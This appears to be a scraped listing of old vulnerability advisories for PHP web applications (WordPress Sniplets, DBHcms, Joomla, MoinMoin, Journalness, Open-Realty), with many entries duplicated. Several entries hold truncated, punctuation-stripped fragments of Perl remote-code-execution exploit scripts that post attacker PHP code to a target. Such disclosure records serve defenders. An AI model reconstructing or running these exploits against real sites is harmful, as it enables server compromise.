CVE-2008-1060

Eval injection vulnerability in modules/execute.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via the text parameter...

WordPress Sniplets Plugin <= 1.2.2 - Remote File Inclusion

Because of this vulnerability in modules/syntaxhighlight.php, the attackers can execute arbitrary PHP code via a URL in the "libpath" parameter. Solution Update the plugin...

DBHcms &lt;= 1.1.4 Remote File Inclusion exploit

No description provided by source. !/usr/bin/perl DBHcms = 1.1.4 Remote File Inclusion exploit Vendor url: www.drbenhur.com exploit is hard to execute through a browser -possible though- since it's with POST Iron http://www.randombase.com require LWP::UserAgent; Shell: ?php...

DBHcms 1.1.4 - &#039;code&#039; Remote File Inclusion

!/usr/bin/perl DBHcms $shellurl = "http://localhost/s.txt"; print " DBHcms ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to evaluate? "; chomp$code=; $code = s/|new; $ua-timeout10; $ua-envproxy; $response = $ua-post$target,...

Joomla! 'mosConfig_absolute_path' Parameter Remote File Include

The version of Joomla! running on the remote host is affected by a remote file include vulnerability due to improper sanitization of user-supplied input to the 'mosConfigabsolutepath' parameter before using it in the index.php script to include PHP code. Provided 'RGEMULATION' is not defined in t...

CVE-2008-0782

Directory traversal vulnerability in MoinMoin 1.5.8 and earlier allows remote attackers to overwrite arbitrary files via a .. dot dot in the MOINID user ID in a cookie for a userform action. NOTE: this issue can be leveraged for PHP code execution via the quicklinks parameter...

Directory traversal

Directory traversal vulnerability in MoinMoin 1.5.8 and earlier allows remote attackers to overwrite arbitrary files via a .. dot dot in the MOINID user ID in a cookie for a userform action. NOTE: this issue can be leveraged for PHP code execution via the quicklinks parameter...

CVE-2008-0782

Directory traversal vulnerability in MoinMoin 1.5.8 and earlier allows remote attackers to overwrite arbitrary files via a .. dot dot in the MOINID user ID in a cookie for a userform action. NOTE: this issue can be leveraged for PHP code execution via the quicklinks parameter...

CVE-2008-0782

Directory traversal vulnerability in MoinMoin 1.5.8 and earlier allows remote attackers to overwrite arbitrary files via a .. dot dot in the MOINID user ID in a cookie for a userform action. NOTE: this issue can be leveraged for PHP code execution via the quicklinks parameter...

CVE-2008-0782

CVE-2008-0782 describes a directory traversal in MoinMoin up to version 1.5.8 and earlier. An attacker could overwrite arbitrary files by sending a dot-dot in the MOIN_ID cookie during a userform action; the issue could also enable PHP code execution via the quicklinks parameter. The vulnerabilit...

CVE-2008-0782

Removed by vendor...

Remote file inclusion

PHP remote file inclusion vulnerability in membershelp.php in Joovili 2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the hlp parameter...

CVE-2008-0743

PHP remote file inclusion vulnerability in membershelp.php in Joovili 2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the hlp parameter...

SA-2008-017 - Header image - Access bypass

The Header image module allows sites to display an image on selected pages based on the node id, path, taxonomy, node type, containing book or the result of PHP code. The module contains a vulnerability where access to the module's administration pages is granted to any user, including the...

journalness-exec.txt

!/usr/bin/perl Vendor url: journalness.sourceforge.net note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Journalness ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to...

openrealty-exec.txt

!/usr/bin/perl Vendor url: www.open-realty.org note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Open-Realty ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to evaluate? ";...

Journalness 4.1 - last_module Remote Code Execution

Journalness 4.1 - lastmodule Remote Code Execution !/usr/bin/perl Vendor url: journalness.sourceforge.net note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Journalness ; if$target ! /^http:/// $target = "http://".$target;...

Open-Realty 2.4.3 - last_module Remote Code Execution

Open-Realty 2.4.3 - lastmodule Remote Code Execution !/usr/bin/perl Vendor url: www.open-realty.org note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Open-Realty ; if$target ! /^http:/// $target = "http://".$target; if$target !...

Journalness 4.1 - &#039;last_module&#039; Remote Code Execution

!/usr/bin/perl Vendor url: journalness.sourceforge.net note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Journalness ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to...

CVE-2008-0635

Unspecified vulnerability in the delivery engine in Openads 2.4.0 through 2.4.2 allows remote attackers to execute arbitrary PHP code via unknown vectors...